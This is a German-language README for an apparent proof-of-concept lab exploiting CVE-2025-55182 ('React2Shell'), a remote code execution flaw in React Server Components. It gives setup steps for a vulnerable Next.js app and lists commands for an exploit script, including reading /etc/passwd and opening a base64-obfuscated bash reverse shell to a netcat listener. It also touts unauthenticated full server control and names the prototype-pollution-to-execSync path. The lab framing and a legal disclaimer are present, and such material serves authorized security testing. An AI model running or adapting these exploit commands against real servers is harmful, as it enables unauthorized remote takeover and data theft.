
CVE-2025-55182 React2Shell PoC Labor
Ein umfassendes Labor zur Demonstration und zum Testen der kritischen Schwachstelle CVE-2025-55182 in React Server Components.
Dieses Repository ist vorgesehen für:
Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unbefugter Zugriff ist illegal.
✅ Beliebige Befehle ohne Authentifizierung ausführen
✅ Systemdateien lesen
✅ Dateien erstellen und ändern
✅ Reverse-Shell-Verbindungen herstellen
✅ Volle Serverkontrolle erlangen
npm install --legacy-peer-deps
npm run dev
Der Server startet unter http://localhost:3000
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# Terminal 1 - Listener
nc -lvnp 4444
# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # Vulnerable Next.js application
├── exploit/ # Working PoC exploit
│ └── rce_final.py # Main exploit script
├── check-cve.sh # Automated vulnerability checker
├── package.json # Vulnerable dependencies
└── README.md
Die Schwachstelle befindet sich in der Deserialisierungslogik von React Server Components-Payloads. Der Exploit nutzt Prototype Pollution, um über process.mainModule.require('child_process').execSync() beliebigen Code auszuführen.
Dieser Code wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Unbefugter Zugriff auf Computersysteme ist gesetzeswidrig, etwa nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen in anderen Rechtsordnungen.
Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen.
Nach der Arbeit mit diesem Labor werden Sie verstehen: